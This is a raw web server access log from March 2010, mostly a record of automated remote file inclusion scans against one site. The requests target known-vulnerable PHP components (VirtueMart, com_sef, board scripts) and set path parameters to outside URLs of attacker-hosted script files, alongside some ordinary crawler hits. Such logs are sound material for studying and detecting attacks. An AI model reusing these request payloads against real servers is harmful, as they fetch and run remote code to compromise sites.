64.15.152.132 - - [01/Mar/2010:04:00:10 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:00:10 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:00:10 -0800] "GET /logs/access_100221.log%20%20/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:00:17 -0800] "GET /logs/access_100221.log%20%20/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:00:18 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:00:18 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:03:24 -0800] "GET /logs/access_100121.log%20%20/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:03:33 -0800] "GET /logs/access_100121.log%20%20/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:04:46 -0800] "GET /logs/access_100129.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:04:48 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:04:49 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:08:55 -0800] "GET /logs/access_100217.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:08:55 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:08:55 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:04:09:53 -0800] "GET /components/com_sef/sef.http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:04:09:53 -0800] "GET /logs//components/com_sef/sef.http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:10:02 -0800] "GET /logs/access_100223.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:11:14 -0800] "GET /logs/access_100221.log/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:11:59 -0800] "GET /logs/access_100221.log/bbs/delete_all.php?board_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:13:38 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:13:38 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:13:38 -0800] "GET /logs/access_100129.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:15:01 -0800] "GET /logs/access_100223.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:04:15:11 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:04:15:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:04:15:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:04:15:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:04:15:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:04:15:26 -0800] "GET /logs/access_100204.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.84.249.82 - - [01/Mar/2010:04:15:27 -0800] "GET /logs/bbs//delete_all.php?board_skin_path=http://www.acucentersc.com/bbs/img/title_memo_03_on.gif???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.84.249.82 - - [01/Mar/2010:04:15:27 -0800] "GET /logs/access_100203.log%20%20/bbs//delete_all.php?board_skin_path=http://www.acucentersc.com/bbs/img/title_memo_03_on.gif???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.84.249.82 - - [01/Mar/2010:04:15:27 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.acucentersc.com/bbs/img/title_memo_03_on.gif???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.84.249.82 - - [01/Mar/2010:04:15:27 -0800] "GET /logs/access_100121.log%20%20/bbs//delete_all.php?board_skin_path=http://www.acucentersc.com/bbs/img/title_memo_03_on.gif???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:04:18:47 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:04:18:47 -0800] "GET /logs/access_100223.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:04:18:47 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:04:20:15 -0800] "GET /logs//components/com_sef/sef.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:04:20:15 -0800] "GET /components/com_sef/sef.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:04:21:23 -0800] "GET /logs/access_100211.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:04:21:23 -0800] "GET /logs/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:04:21:23 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
72.44.53.29 - - [01/Mar/2010:04:21:35 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
72.44.53.29 - - [01/Mar/2010:04:21:36 -0800] "GET /orange_g/forum/viewtopic.php?p=25236 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
110.45.145.178 - - [01/Mar/2010:04:22:13 -0800] "GET /logs/access_100215.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [01/Mar/2010:04:24:07 -0800] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:04:24:30 -0800] "GET /logs/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.155 - - [01/Mar/2010:04:24:33 -0800] "GET /logs/access_100204.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:04:24:34 -0800] "GET /errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
219.150.205.156 - - [01/Mar/2010:04:25:23 -0800] "GET /logs/access_100127.log/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
72.44.53.29 - - [01/Mar/2010:04:30:18 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
72.44.53.29 - - [01/Mar/2010:04:30:18 -0800] "GET /orange_g/forum/viewtopic.php?p=25224 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
110.45.145.178 - - [01/Mar/2010:04:34:29 -0800] "GET /logs/access_100217.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [01/Mar/2010:04:34:31 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "-" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:34:46 -0800] "GET /logs/access_100215.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:35:02 -0800] "GET /logs/access_100129.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [01/Mar/2010:04:35:47 -0800] "GET /ideal/forum/viewtopic.php?p=21110 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:04:35:50 -0800] "GET /config.inc.php?_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:04:35:50 -0800] "GET /logs/access_100222.log/config.inc.php?_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:04:35:50 -0800] "GET /logs/config.inc.php?_path=http://saltoz.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:04:38:28 -0800] "GET /components/com_sef/sef.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
216.119.103.16 - - [01/Mar/2010:04:38:28 -0800] "GET /logs//components/com_sef/sef.php?mosConfig.absolute.path=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
110.45.145.178 - - [01/Mar/2010:04:39:08 -0800] "GET /logs/access_100223.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.53.29 - - [01/Mar/2010:04:39:34 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
72.44.53.29 - - [01/Mar/2010:04:39:34 -0800] "GET /orange_g/forum/viewtopic.php?p=25211 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
72.44.53.29 - - [01/Mar/2010:04:40:39 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
72.44.53.29 - - [01/Mar/2010:04:40:40 -0800] "GET /orange_g/forum/viewtopic.php?p=25245 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
210.205.6.233 - - [01/Mar/2010:04:43:17 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:04:43:23 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [01/Mar/2010:04:43:38 -0800] "GET /logs/access_100301.log HTTP/1.0" 200 1310194 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:04:44:16 -0800] "GET /logs/access_100123.log/?sourcedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:04:44:16 -0800] "GET /logs/?sourcedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:04:44:17 -0800] "GET /?sourcedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:04:45:09 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:04:45:09 -0800] "GET /logs/access_100201.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:04:45:09 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:45:12 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:45:12 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:45:13 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:45:18 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:45:18 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:45:19 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:04:45:25 -0800] "GET /logs/access_100126.log%20%20/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:27 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:27 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:27 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:33 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:33 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:33 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:35 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:35 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:45:35 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:00 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:00 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:00 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:11 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:11 -0800] "GET /logs/access_100215.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:11 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:46:20 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:46:21 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.132.3 - - [01/Mar/2010:04:46:22 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:50 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:46:59 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:47:13 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:04:47:14 -0800] "GET /logs/access_100203.log%20%20//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:47:32 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:47:32 -0800] "GET /logs/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:47:33 -0800] "GET /index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:47:43 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:48:01 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:48:01 -0800] "GET /logs/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:48:01 -0800] "GET /index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:04:48:17 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [01/Mar/2010:04:49:35 -0800] "GET /logs/access_100201.log/?sourcedir=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:04:50:47 -0800] "GET /logs/access_100201.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.108.237.12 - - [01/Mar/2010:04:50:56 -0800] "GET /logs/access_100126.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:53:42 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.84.221 - - [01/Mar/2010:04:53:50 -0800] "GET /logs/access_100215.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.supravis.hu//components/com_explorer/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
